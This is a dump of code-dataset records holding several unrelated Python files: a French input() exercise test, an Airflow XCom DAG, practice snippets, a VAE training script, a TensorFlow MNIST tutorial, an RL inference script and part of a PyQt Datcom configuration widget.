len(params) > 0:\n print(params[0], end=\"\")\n\n entrée = str(entrées.pop())\n print(entrée)\n\n échec = False\n return entrée\n\n\nbuiltins.input = nouv_input\n\ntry:\n import coffre4\n\n if échec:\n fail()\n send_msg(\"Quelque chose cloche\", \"Avez-vous bien utilisé «input»?\")\n else:\n try:\n int(coffre4.entrée)\n success()\n send_msg(\n \"Bravo!\", \"L'entrée de l'utilisateur (\" + coffre4.entrée + \") est maintenant stockée sous le nom «entrée».\")\n except 
AttributeError as e:\n fail()\n send_msg(\"Encore un peu!\", \"input() sert à saisir une entrée au clavier. Pour pouvoir l'utiliser plus tard, il faut la stocker sous le nom «entrée» en faisant «entrée = input()».\")\n\nexcept Exception as e:\n fail()\n échec = True\n send_msg(\"Pas tout à fait\",\n 'Quelque chose ne va pas. Utilisez «entrée = input()» après le message de bienvenue.')\n send_msg(\"Erreur\", e)\n","sub_path":"python-project/test_coffre4.py","file_name":"test_coffre4.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"6822093","text":"from datetime import datetime, timedelta\nfrom airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nimport logging\n\nDAG = DAG(\n dag_id = 'simple_xcom',\n start_date = datetime(2017, 10, 26),\n schedule_interval = None,\n)\n\n\ndef push_function(**context):\n msg = 'the_message'\n logging.info(\"message to push: '%s'\" % msg)\n print(\"message to push: '%s'\" % msg)\n task_instance = context['task_instance']\n task_instance.xcom_push(key = 'the_message', value = msg)\n\n\npush_task = PythonOperator(\n task_id = 'push_task',\n python_callable = push_function,\n provide_context = True,\n dag = DAG,\n)\n\n\ndef pull_function(**kwargs):\n ti = kwargs['ti']\n msg = ti.xcom_pull(task_ids = 'push_task', key = 'the_message')\n logging.info(\"received message: '%s'\" % msg)\n print(\"received message: '%s'\" % msg)\n\n\npull_task = PythonOperator(\n task_id = 'pull_task',\n python_callable = pull_function,\n provide_context = True,\n dag = DAG,\n)\n\npush_task >> pull_task\n","sub_path":"tensorflow/19.airflow-elasticsearch-flask/dags/test_xcom.py","file_name":"test_xcom.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"493878627","text":"# f = \"hello\"\n#\n# print(f[:-1])\n#\n#\n# a = \"TESTBOX PDM, TRAILER, 589567 TESTBOX PDM, TRAILER, 589567 \"\n#\n#\n#\n# if \"TRAILE\" in a:\n# print(\"hppray\")\n# else:\n# print(\"--------bad\")\n#\n#\n# a = ['df']\n#\n# if not a:\n# print(\"hello111\")\n# elif a:\n# print(\"yes\")\n#\n#\n# print(\" xyz d\".rstrip())\n#\n# a = 2\n#\n# if a == 2:\n# print(\"sdd\")\n#\n# print(\"end\")\n#\n#\n# aaa = [1,2,3,4,5]\n#\n# for el in aaa:\n# if el == 2:\n# print(\"sadsad\")\n# print(el)\n#\n#\n# de = ['hello hhh', 'no']\n#\n#\n# if \"no\" in de:\n# print(\"DA\")\n#\n#\n# f = []\n#\n# for el in f:\n# if \"dd\" not in f[0]:\n# print(\"hello1111111\")\n#\n# values = [' ','sda','asdsa',' ']\n#\n#\n# # catch the first non-empty value\n# str_list = [name for name in values if name.strip()]\n#\n# print(str_list[0])\n# print(type(str_list[0]))\n#\n#\n# print(range(5))\n#\n# for el in range(5):\n# print(el)\n#\n#\n# a = \"hello \"\n#\n# v = a.rstrip()\n#\n# print(a.count(\" \"))\n# print(v.count(\" \"))\n#\n# print(a[-3:])\n# print(a)\n# print(a.rstrip())\n#\n# av = ['hello']\n# cd = av[-2:]\n# print(cd)\n#\n# elements = ['first', 'second', 'third']\n#\n# elements_second = ['just']\n#\n# values = []\n#\n# index = 0\n#\n# if elements_second:\n# for el in elements:\n# if index == 0:\n# continue\n# values.append(elements[index])\n# index = index + 1\n#\n# print(values)\n#\n#\n#\n# print(\"12345678\"[:4])\n\n# def square_digits(num):\n# a = str(num)\n# c = \"\"\n# for i in a:\n# b = str(int(i)**2)\n# c = c + b\n#\n# return int(c)\n\n# def get_sum(a,b):\n# if a == b:\n# return a\n# elif a > b:\n# return 
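# reviewer aside (added): this commented get_sum draft has a loop-free closed\n# form: get_sum(a, b) == (a + b) * (abs(b - a) + 1) // 2   (Gauss pairing),\n# e.g. get_sum(435, 2) == 437 * 434 // 2 == 94829, matching the range() sum.\n#         return 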
sum(range(b, a+1))\n# else:\n# return sum(range(a,b+1))\n#\n# print(get_sum(435, 2))\n#\n#\n# def accum(s):\n# index = 0\n# word = \"\"\n# for letter in s:\n# index = index + 1\n# letter = letter * index\n# if index == 1:\n# item = \"\".join(letter.title())\n# else:\n# item = \"-\" + \"\".join(letter.title())\n# word = word + item\n#\n# return word\n#\n# print(accum(\"aaaaz\"))\n#\n# array =[1,1,1,12,11]\n#\n# def find_uniq(arr):\n# # a,b = set(arr)\n# a = list(set(arr))\n# print(a)\n# b = [i for i in a if arr.count(i) == 1]\n# # for i in a:\n# # if arr.count(i) == 1:\n# # b = i\n# # return a if arr.count(a) == 1 else b\n# for i in b:\n# b = f\"{i}\"\n# return b\n#\n# print(find_uniq(array))\n\n\ndef removeDuplicates(nums):\n arr = []\n for i in nums:\n if i not in arr:\n arr.append(i)\n return print(arr)\n\n\nremoveDuplicates([1, 2, 3, 3, 3, 3])\n\ntest_arr = [1, 1, 1, 1, 2, 3, -1, 100]\n\nmin = None\nmax = None\n\nfor i in test_arr:\n if min is None:\n min = i\n elif min < i:\n min = i\n if max is None:\n max = i\n elif max > i:\n max = i\nprint(min, max)\n\n\ndef outer(x):\n obj_lam = lambda y: x + y\n return obj_lam(x)\n\n\nprint(outer(5))\n\nnum = 5\nif num // 2 == 2:\n print(num)\n\n\ndef first_non_repeating_letter(string):\n index = 0\n before_format = string\n string = string.lower()\n if string:\n for l in string:\n after_l = string[index + 1:]\n before_l = string[:index]\n if l not in after_l and l not in before_l:\n return before_format[index]\n index = index + 1\n else:\n return ''\n else:\n return ''\n\n\nprint('++++++++++')\n\nprint(first_non_repeating_letter('sTreSS'))\n\nq = 'helloh'\n\nprint(list(enumerate(q)))\n\n\ndef check_unique(string):\n lower_str = string.lower()\n for i, letter in enumerate(lower_str):\n if q.count(letter) == 1:\n return string[i]\n return ''\n\n\nprint(check_unique('helloh'))\n\n\n\ndup = [1,1,1,1,2,3,3,3,3,4]\n\n\nun = []\nfor i in dup:\n if i not in un:\n un.append(i)\n\n#print(un)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"326847111","text":"import sys\nimport os\nimport time\nimport importlib\nimport argparse\n\nimport numpy as np\n\nimport torch\nimport torch.utils.data\nfrom torch import optim\n\nfrom modules import ResNetEncoderV2, BNResNetEncoderV2, PixelCNNDecoderV2\nfrom modules import VAE\nfrom logger import Logger\nfrom utils import calc_mi\n\nclip_grad = 5.0\ndecay_epoch = 20\nlr_decay = 0.5\nmax_decay = 5\n\n\ndef init_config():\n parser = argparse.ArgumentParser(description='VAE mode collapse study')\n\n # model hyperparameters\n parser.add_argument('--dataset', default='omniglot', type=str, help='dataset to use')\n\n # optimization parameters\n parser.add_argument('--nsamples', type=int, default=1, help='number of samples for training')\n parser.add_argument('--iw_nsamples', type=int, default=500,\n help='number of samples to compute importance weighted estimate')\n # select mode\n parser.add_argument('--eval', action='store_true', default=False, help='compute iw nll')\n parser.add_argument('--load_path', type=str, default='')\n # annealing paramters\n parser.add_argument('--warm_up', type=int, default=10)\n parser.add_argument('--kl_start', type=float, default=1.0)\n\n # these are for slurm purpose to save model\n parser.add_argument('--jobid', type=int, default=0, help='slurm job id')\n parser.add_argument('--taskid', type=int, default=0, help='slurm task id')\n 
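# reviewer note (added): '--device' accepts any torch device string; the\n    # check right after parsing only looks for the substring 'cuda', e.g.\n    #   python image.py --device cuda:0   -> args.cuda is True\n    #   python image.py                   -> default 'cpu', args.cuda stays False\n    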
parser.add_argument('--device', type=str, default=\"cpu\")\n parser.add_argument('--delta_rate', type=float, default=1.0,\n help=\" coontrol the minization of the variation of latent variables\")\n parser.add_argument('--gamma', type=float, default=0.5) # BN-VAE\n parser.add_argument(\"--reset_dec\", action=\"store_true\", default=False)\n parser.add_argument(\"--nz_new\", type=int, default=32) # myGaussianLSTMencoder\n parser.add_argument('--p_drop', type=float, default=0.2) # p \\in [0, 1]\n\n args = parser.parse_args()\n if 'cuda' in args.device:\n args.cuda = True\n else:\n args.cuda = False\n\n load_str = \"_load\" if args.load_path != \"\" else \"\"\n save_dir = \"models/%s%s/\" % (args.dataset, load_str)\n\n\n if args.warm_up > 0 and args.kl_start < 1.0:\n cw_str = '_warm%d' % args.warm_up\n else:\n cw_str = ''\n\n hkl_str = 'KL%.2f' % args.kl_start\n drop_str = '_drop%.2f' % args.p_drop if args.p_drop != 0 else ''\n\n seed_set = [783435, 101, 202, 303, 404, 505, 606, 707, 808, 909]\n args.seed = seed_set[args.taskid]\n\n if args.gamma > 0:\n gamma_str = '_gamma%.2f' % (args.gamma)\n else:\n gamma_str = ''\n\n id_ = \"%s_%s%s%s%s_dr%.2f_nz%d%s_%d_%d_%d\" % \\\n (args.dataset, hkl_str,\n cw_str, load_str, gamma_str, args.delta_rate,\n args.nz_new,drop_str,\n args.jobid, args.taskid, args.seed)\n\n save_dir += id_\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n save_path = os.path.join(save_dir, 'model.pt')\n\n args.save_path = save_path\n print(\"save path\", args.save_path)\n\n args.log_path = os.path.join(save_dir, \"log.txt\")\n print(\"log path\", args.log_path)\n\n # load config file into args\n config_file = \"config.config_%s\" % args.dataset\n params = importlib.import_module(config_file).params\n args = argparse.Namespace(**vars(args), **params)\n if args.nz != args.nz_new:\n args.nz = args.nz_new\n print('args.nz', args.nz)\n\n if 'label' in params:\n args.label = params['label']\n else:\n args.label = False\n\n args.kl_weight = 1\n\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.cuda:\n torch.cuda.manual_seed(args.seed)\n torch.backends.cudnn.deterministic = True\n return args\n\n\ndef test(model, test_loader, mode, args):\n report_kl_loss = report_kl_t_loss = report_rec_loss = 0\n report_num_examples = 0\n mutual_info = []\n for datum in test_loader:\n batch_data, _ = datum\n batch_data = batch_data.to(args.device)\n\n batch_size = batch_data.size(0)\n\n report_num_examples += batch_size\n\n loss, loss_rc, loss_kl = model.loss(batch_data, 1.0, args, training=False)\n loss_kl_t = model.KL(batch_data, args)\n\n assert (not loss_rc.requires_grad)\n\n loss_rc = loss_rc.sum()\n loss_kl = loss_kl.sum()\n loss_kl_t = loss_kl_t.sum()\n\n report_rec_loss += loss_rc.item()\n report_kl_loss += loss_kl.item()\n report_kl_t_loss += loss_kl_t.item()\n\n mutual_info = calc_mi(model, test_loader, device=args.device)\n\n test_loss = (report_rec_loss + report_kl_loss) / report_num_examples\n\n nll = (report_kl_t_loss + report_rec_loss) / report_num_examples\n kl = report_kl_loss / report_num_examples\n kl_t = report_kl_t_loss / report_num_examples\n\n print('%s --- avg_loss: %.4f, kl: %.4f, mi: %.4f, recon: %.4f, nll: %.4f' % \\\n (mode, test_loss, report_kl_t_loss / report_num_examples, mutual_info,\n report_rec_loss / report_num_examples, nll))\n sys.stdout.flush()\n\n return test_loss, nll, kl_t ##返回真实的kl_t 不是训练中的kl\n\n\ndef calc_au(model, test_loader, delta=0.01):\n \"\"\"compute the number of active units\n \"\"\"\n means = []\n for datum in 
test_loader:\n batch_data, _ = datum\n\n batch_data = batch_data.to(args.device)\n\n mean, _ = model.encode_stats(batch_data)\n means.append(mean)\n\n means = torch.cat(means, dim=0)\n au_mean = means.mean(0, keepdim=True)\n\n # (batch_size, nz)\n au_var = means - au_mean\n ns = au_var.size(0)\n\n au_var = (au_var ** 2).sum(dim=0) / (ns - 1)\n\n return (au_var >= delta).sum().item(), au_var\n\n\ndef calc_iwnll(model, test_loader, args):\n report_nll_loss = 0\n report_num_examples = 0\n for id_, datum in enumerate(test_loader):\n batch_data, _ = datum\n batch_data = batch_data.to(args.device)\n\n batch_size = batch_data.size(0)\n\n report_num_examples += batch_size\n\n if id_ % (round(len(test_loader) / 10)) == 0:\n print('iw nll computing %d0%%' % (id_ / (round(len(test_loader) / 10))))\n sys.stdout.flush()\n\n loss = model.nll_iw(batch_data, nsamples=args.iw_nsamples)\n\n report_nll_loss += loss.sum().item()\n\n nll = report_nll_loss / report_num_examples\n\n print('iw nll: %.4f' % nll)\n sys.stdout.flush()\n return nll\n\n\ndef main(args):\n if args.cuda:\n print('using cuda')\n print(args)\n\n args.device = torch.device(args.device)\n device = args.device\n\n opt_dict = {\"not_improved\": 0, \"lr\": 0.001, \"best_loss\": 1e4}\n\n all_data = torch.load(args.data_file)\n x_train, x_val, x_test = all_data\n if args.dataset == 'omniglot':\n\n x_train = x_train.to(device)\n x_val = x_val.to(device)\n x_test = x_test.to(device)\n y_size = 1\n y_train = x_train.new_zeros(x_train.size(0), y_size)\n y_val = x_train.new_zeros(x_val.size(0), y_size)\n y_test = x_train.new_zeros(x_test.size(0), y_size)\n\n print(torch.__version__)\n train_data = torch.utils.data.TensorDataset(x_train, y_train)\n val_data = torch.utils.data.TensorDataset(x_val, y_val)\n test_data = torch.utils.data.TensorDataset(x_test, y_test)\n\n\n train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True)\n val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=True)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size, shuffle=True)\n print('Train data: %d batches' % len(train_loader))\n print('Val data: %d batches' % len(val_loader))\n print('Test data: %d batches' % len(test_loader))\n sys.stdout.flush()\n\n log_niter = len(train_loader) // 5\n\n if args.gamma > 0:\n encoder = BNResNetEncoderV2(args)\n else:\n encoder = ResNetEncoderV2(args)\n\n decoder = PixelCNNDecoderV2(args)\n\n vae = VAE(encoder, decoder, args).to(device)\n\n if args.eval:\n print('begin evaluation')\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=50, shuffle=True)\n vae.load_state_dict(torch.load(args.load_path))\n vae.eval()\n with torch.no_grad():\n test(vae, test_loader, \"TEST\", args)\n au, au_var = calc_au(vae, test_loader)\n print(\"%d active units\" % au)\n # print(au_var)\n calc_iwnll(vae, test_loader, args)\n return\n\n enc_optimizer = optim.Adam(vae.encoder.parameters(), lr=0.001)\n dec_optimizer = optim.Adam(vae.decoder.parameters(), lr=0.001)\n opt_dict['lr'] = 0.001\n\n iter_ = 0\n best_loss = 1e4\n decay_cnt = 0\n vae.train()\n start = time.time()\n\n kl_weight = args.kl_start\n anneal_rate = (1.0 - args.kl_start) / (args.warm_up * len(train_loader))\n\n for epoch in range(args.epochs):\n\n report_kl_loss = report_rec_loss = 0\n report_num_examples = 0\n for datum in train_loader:\n batch_data, _ = datum\n batch_data = batch_data.to(device)\n if args.dataset != 'fashion-mnist':\n batch_data = torch.bernoulli(batch_data)\n 
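# reviewer note (added): re-sampling a binary image from the pixel\n            # intensities on every pass is the usual dynamic-binarization trick for\n            # Omniglot/MNIST-style data (fashion-mnist stays real-valued), e.g.\n            #   torch.bernoulli(torch.tensor([0.1, 0.9]))  # often tensor([0., 1.])\n            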
batch_size = batch_data.size(0)\n\n report_num_examples += batch_size\n\n # kl_weight = 1.0\n\n kl_weight = min(1.0, kl_weight + anneal_rate)\n args.kl_weight = kl_weight\n\n enc_optimizer.zero_grad()\n dec_optimizer.zero_grad()\n\n loss, loss_rc, loss_kl = vae.loss(batch_data, kl_weight, args)\n\n loss = loss.mean(dim=-1)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(vae.parameters(), clip_grad)\n\n loss_rc = loss_rc.sum()\n loss_kl = loss_kl.sum()\n\n enc_optimizer.step()\n dec_optimizer.step()\n\n report_rec_loss += loss_rc.item()\n report_kl_loss += loss_kl.item()\n\n if iter_ % log_niter == 0:\n\n train_loss = (report_rec_loss + report_kl_loss) / report_num_examples\n if epoch == 0:\n vae.eval()\n with torch.no_grad():\n mi = calc_mi(vae, val_loader, device=device)\n au, _ = calc_au(vae, val_loader)\n\n vae.train()\n\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, mi: %.4f, recon: %.4f,' \\\n 'au %d, time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_examples, mi,\n report_rec_loss / report_num_examples, au, time.time() - start))\n else:\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, recon: %.4f,' \\\n 'time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_examples,\n report_rec_loss / report_num_examples, time.time() - start))\n sys.stdout.flush()\n\n report_rec_loss = report_kl_loss = 0\n report_num_examples = 0\n\n iter_ += 1\n\n print('kl weight %.4f' % args.kl_weight)\n print('epoch: %d, VAL' % epoch)\n\n vae.eval()\n\n with torch.no_grad():\n loss, nll, kl = test(vae, val_loader, \"VAL\", args)\n au, au_var = calc_au(vae, val_loader)\n print(\"%d active units\" % au)\n # print(au_var)\n\n if loss < best_loss:\n print('update best loss')\n best_loss = loss\n torch.save(vae.state_dict(), args.save_path)\n\n if loss > best_loss:\n opt_dict[\"not_improved\"] += 1\n if opt_dict[\"not_improved\"] >= decay_epoch:\n opt_dict[\"best_loss\"] = loss\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"lr\"] = opt_dict[\"lr\"] * lr_decay\n vae.load_state_dict(torch.load(args.save_path))\n decay_cnt += 1\n print('new lr: %f' % opt_dict[\"lr\"])\n enc_optimizer = optim.Adam(vae.encoder.parameters(), lr=opt_dict[\"lr\"])\n dec_optimizer = optim.Adam(vae.decoder.parameters(), lr=opt_dict[\"lr\"])\n else:\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"best_loss\"] = loss\n\n if decay_cnt == max_decay:\n break\n\n if epoch % args.test_nepoch == 0:\n with torch.no_grad():\n loss, nll, kl = test(vae, test_loader, \"TEST\", args)\n\n vae.train()\n\n # compute importance weighted estimate of log p(x)\n vae.load_state_dict(torch.load(args.save_path))\n vae.eval()\n with torch.no_grad():\n loss, nll, kl = test(vae, test_loader, \"TEST\", args)\n au, au_var = calc_au(vae, test_loader)\n print(\"%d active units\" % au)\n # print(au_var)\n\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=50, shuffle=True)\n\n with torch.no_grad():\n calc_iwnll(vae, test_loader, args)\n\n\nif __name__ == '__main__':\n args = init_config()\n if not args.eval:\n sys.stdout = Logger(args.log_path)\n main(args)\n","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":13125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"271848000","text":"# Copyright 2015 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"A very simple MNIST classifier.\nSee extensive documentation at\nhttp://tensorflow.org/tutorials/mnist/beginners/index.md\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Import data\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_string('data_dir', '/tmp/data/', 'Directory for storing data')\n\nmnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)\nprint(\"Type of data \", type(mnist.train.images))\nprint(\"Training input and output shapes \", mnist.train.images.shape, mnist.train.labels.shape)\n\nsess = tf.InteractiveSession()\n\n# Create the model\n# 784 input features are mapped to 10 outputs via weights and bias\n# which are then passed through softmax to map to range [0,1] and sum to 1\nx = tf.placeholder(tf.float32, [None, 784]) # 'None' can be any length\nW = tf.Variable(tf.zeros([784, 10])) # Variable can be used and modified\nb = tf.Variable(tf.zeros([10]))\ny = tf.nn.softmax(tf.matmul(x, W) + b) # model definition\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10]) # outputs\ncross_entropy = -tf.reduce_sum(y_ * tf.log(y))\nsum_square = tf.reduce_sum((y_ - y) * (y_ - y))\n\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(sum_square)\n\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # list of Booleans\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # define accuracy\n\n\n# Train\ntf.initialize_all_variables().run()\nfor i in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100) # stochastic\n train_step.run({x: batch_xs, y_: batch_ys}) # replace placeholders with batch values\n\n # Test trained model\n if i%100 == 0:\n print(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels})) # calc accuracy on test set\n","sub_path":"tf_mnist1.py","file_name":"tf_mnist1.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"558307358","text":"from param import params\nimport gym_boids\nimport gym\nfrom net.ppo import PPO\nfrom torch.distributions import Categorical\nimport torch\nimport numpy as np\nimport util\nimport sys\nimport plot\n\ndef run_network(infer, x):\n \"\"\" Runs the network to determine action given current state\n\n Parameters:\n infer (dict): dictionary of infering variables\n x (np.array): current state to input into neural network\n\n Returns:\n prob (torch.FloatTensor): output of the network, raw softmax distribution\n m (torch.FloatTensor): categorical distribution of output\n u (torch.FloatTensor): actual action selected by the network\n\n \"\"\"\n\n prob = infer['model'].pi(torch.from_numpy(x).float().to(params['device']))\n m = 
Categorical(prob)\n    u = m.sample().item()\n    return prob, m, u\n\ndef transform_state(x, i):\n    \"\"\" Transforms the state to make the inference run more varied.\n\n    Shifts the position state in a circle so the agents are forced to\n    track a point rather than simply move towards a goal point. This\n    is a harder problem to learn.\n\n    Params:\n        x (np.array): current state\n        i (int): iteration # within the episode\n\n    Returns:\n        x_transformed (np.array): augmented/transformed state\n\n    \"\"\"\n\n    x_transformed = x.copy()\n    \n    for agent_idx in range(params['n']):\n        x_transformed[2 * agent_idx * params['num_dims'] :\n                (2 * agent_idx + 1) * params['num_dims'] - 1] -= params['pd'][i, 0]\n\n        x_transformed[2 * agent_idx * params['num_dims'] + 1 :\n                (2 * agent_idx + 1) * params['num_dims']] -= params['pd'][i, 1]\n\n        x_transformed[(2 * agent_idx + 1) * params['num_dims']:\n                2 * (agent_idx + 1) * params['num_dims'] - 1] -= params['vd'][i, 0]\n\n        x_transformed[(2 * agent_idx + 1) * params['num_dims'] + 1:\n                2 * (agent_idx + 1) * params['num_dims']] -= params['vd'][i, 1]\n\n    return x_transformed\n\ndef infer(path, label):\n    \"\"\" Runs a trained RL model for one episode.\n\n    Initializes the environment, loads the saved policy weights, rolls the\n    policy out for one episode, and plots the resulting state space and errors.\n    \"\"\"\n\n    util.set_xd()\n\n    infer = {}  # context dict; note that it shadows this function's name locally\n    infer['env'] = gym.make(params['env_name'])\n    infer['env'].init(params)\n    infer['model'] = PPO(params, infer['env'].observation_space.shape[0]).to(params['device'])\n    infer['model'].load_state_dict(torch.load(path))\n\n    x = transform_state(infer['env'].reset(), 0)\n\n    for i in range(1, params['nt']):\n        prob, m, u = run_network(infer, x)\n        state, _ = infer['env'].step(u)\n        x_prime = transform_state(state, i)\n        x = x_prime\n\n    x = np.array(infer['env'].get_x())\n    plot.plot_SS(x, params['T'], title=f\"State Space after {label}\")\n    plot.plot_error(x, params['T'], title=f\"Errors after {label}\")\n\nif __name__ == '__main__':\n    paths = ['0.24-250.save', '0.65-500.save', '0.82-1000.save', '0.87-2000.save', '0.89-3010.save', '0.89-4020.save', '0.90-5020.save', '0.92-5910.save']\n    labels = ['250 Episodes', '500 Episodes', '1000 Episodes', '2000 Episodes', '3000 Episodes', '4000 Episodes', '5000 Episodes', '6000 Episodes']\n    for i in range(len(paths)):\n        infer(f'saves/pweighting/{paths[i]}', labels[i])\n    plot.save_figs()\n","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"465515045","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nModule implementing ASYFLP.\n\"\"\"\n\nfrom PyQt5.QtCore import pyqtSlot, Qt, QPoint #, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QMenu #, QLineEdit, QComboBox, QTableWidget\nfrom PyDatcomLab.GUIs.PlaneConfiguration import DatcomCARD as DC\n\n\nfrom PyDatcomLab.Core import dcModel \n\nimport logging\n\n\nfrom Ui_ASYFLP import Ui_ASYFLP\n\n\nclass ASYFLP(QWidget, Ui_ASYFLP):\n    \"\"\"\n    Class documentation goes here.\n    \"\"\"\n    def __init__(self, parent=None, tModel = None):\n        \"\"\"\n        Constructor\n        \n        @param parent reference to the parent widget\n        @type QWidget\n        \"\"\"\n        super(ASYFLP, self).__init__(parent)\n        self.setupUi(self)\n        # Create the logger\n        self.logger = logging.getLogger(r'Datcomlogger')\n        # Begin the definition of the core data\n        self.NameList = 'ASYFLP'\n        self.VariableList = {\n                 'STYPE':{ 'TYPE':'List' ,'Range':['1.0', '2.0', '3.0','4.0', '5.0'], 'Default':'1.0'}, \n                 'NDELTA':{ 'TYPE':'INT' ,'Range':[0, 9 ] }, \n                 'SPANFI':{ 'TYPE':'REAL' }, 
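# REAL entries here are single-value card fields; the 'Array' entries below\n                 # are per-row table columns whose row count is driven by NDELTA (max 9).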
\n                 'SPANFO':{ 'TYPE':'REAL' },\n                 'PHETE':{ 'TYPE':'REAL' }, \n                 'CHRDFI':{ 'TYPE':'REAL' }, \n                 'CHRDFO':{ 'TYPE':'REAL' }, \n                 'XSPRME':{ 'TYPE':'REAL' }, \n                 'DELTAL':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n                 'DELTAR':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n                 'DELTAD':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n                 'DELTAS':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'},\n                 'XSOC':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'}, \n                 'HSOC':{ 'TYPE':'Array', 'Limit':[0, 9] , 'Group':'input'},\n        } \n        #self.NMACHLinkTable = []\n        self.RuleNumToCount = [{'Num':'NDELTA' , 'Group':'input'}, \n                ]\n        self.RuleIndexToCombo = [\n                {'Index':'STYPE', \n                 'HowTo':{'1.0':['DELTAS', 'XSOC', 'HSOC'], \n                          '2.0':['DELTAS', 'XSOC', 'HSOC'], \n                          '3.0':['DELTAD', 'DELTAS', 'HSOC'], \n                          '4.0':['DELTAL', 'DELTAR' ], \n                          '5.0':['DELTAL', 'DELTAR' ], \n                          }, \n                 'Group':'input'} , \n                ] \n        self.RuleVariableStatus = [ \n               {'ControlVar':'STYPE', \n                'HowTo':{\n                    # 0 : 1.0 flap spoiler on the wing\n                    '1.0':{'Disabled':[\n                            'DELTAL', 'DELTAR' , \n                            'CHRDFI', 'CHRDFO',\n                            'DELTAD', \n                            ], \n                           'Enabled':[\n                            'STYPE' , 'NDELTA', \n                            'SPANFI', 'SPANFO', \n                            'PHETE' , 'XSPRME', \n                            'DELTAS',\n                            'XSOC' , 'HSOC',\n                           ]},\n                    # 1 : 2.0 spoiler on the wing \n                    '2.0':{'Disabled':[\n                            'DELTAL', 'DELTAR' , \n                            'CHRDFI', 'CHRDFO',\n                            'DELTAD', \n                            ], \n                           'Enabled':[\n                            'STYPE' , 'NDELTA', \n                            'SPANFI', 'SPANFO', \n                            'PHETE' , 'XSPRME', \n                            'DELTAS',\n                            'XSOC' , 'HSOC',\n                           ]},\n                    # 2 : 3.0 spoiler-slot-deflector\n                    '3.0':{'Disabled':[\n                            'DELTAL', 'DELTAR' , \n                            'CHRDFI', 'CHRDFO',\n                            'XSPRME', \n                            ], \n                           'Enabled':[\n                            'STYPE' , 'NDELTA', \n                            'SPANFI', 'SPANFO', \n                            'PHETE' , \n                            'DELTAD','DELTAS',\n                            'XSOC' , 'HSOC',\n                           ]},\n                    # 3 : 4.0 plain flap aileron \n                    '4.0':{'Disabled':[\n                            'XSPRME', \n                            'XSOC' , 'HSOC',\n                            'DELTAD', 'DELTAS',\n                            'PHETE' ,\n                            ], \n                           'Enabled':[\n                            'STYPE' , 'NDELTA', \n                            'DELTAL', 'DELTAR' ,\n                            'CHRDFI', 'CHRDFO', \n                            'SPANFI', 'SPANFO', \n                           ]},\n                    # 4 : 5.0 differentially deflected horizontal tail \n                    '5.0':{'Disabled':[\n                            'SPANFI', 'SPANFO', \n                            'XSPRME', \n                            'CHRDFI', 'CHRDFO',\n                            'DELTAD', 'DELTAS',\n                            'XSOC' , 'HSOC',\n                            ], \n                           'Enabled':[\n                            'STYPE' , 'NDELTA', \n                            'DELTAL', 'DELTAR' ,\n                            'PHETE' ,\n                           ]}, \n                    }\n               }\n            ]\n\n        # Update the backing data\n        if tModel is None:\n            tModel = dcModel.dcModel('J6', '常规布局') \n        # Define the Datcom card\n        self.DatcomCARD = DC.DatcomCARD(self)\n        #self.InitComboVar(tModel)\n        self.DatcomCARD.InitUi()\n        self.DatcomCARD.setModel(tModel) # set the model\n        \n        # UI state for the table context-menu logic\n        self.curPos = QPoint(0, 